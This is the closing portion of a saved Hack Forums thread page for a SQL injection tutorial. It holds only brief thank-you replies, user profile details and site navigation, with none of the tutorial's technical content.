general SQL knowledge, and not really things you need for injections.<br>I knew about these methods, just couldn't be bothered conjuring up a long syntax <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br>Thanks for sharing <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0"></blockquote><br><blockquote><cite><span>(05-19-2013 06:12 AM)</span>zeru Wrote: <a href="http://www.hackforums.net/showthread.php?pid=32726198#pid32726198" class="quick_jump">►</a></cite>Thanks ajkaro, was scratching my head for a long time on this :)</blockquote><br>Thanks guys for your feed back. I appreciate it. <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></div><div class="post_meta" id="post_meta_32774936"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32774936" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32782108" id="pid32782108"></a><table class="tborder" style="margin-top: 5px; " id="post_32782108" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-21-2013, 08:37 PM <span id="edited_by_32782108"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32782108#pid32782108">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=72496"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/1667c96fb90d94769e72069d6cad71b6.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=72496"><span class="group29">133720</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">&lt;?= Security != Coding ?&gt;<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 132<br>Posts: 2,309<br>Joined: Jun 2009<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=72496"><strong class="reputation_positive">401</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32782108">HQ post in sql injection ,<br>Really Nice and Well Done!<br>Thank ajkaro</div><div class="post_meta" id="post_meta_32782108"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.cyberoot.com/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=72496" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32782108" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (7):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=4" class="pagination_page">4</a> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=5" class="pagination_page">5</a> ... <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=7" class="pagination_last">7</a> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3487536">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3487536" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3487536&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3487536.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->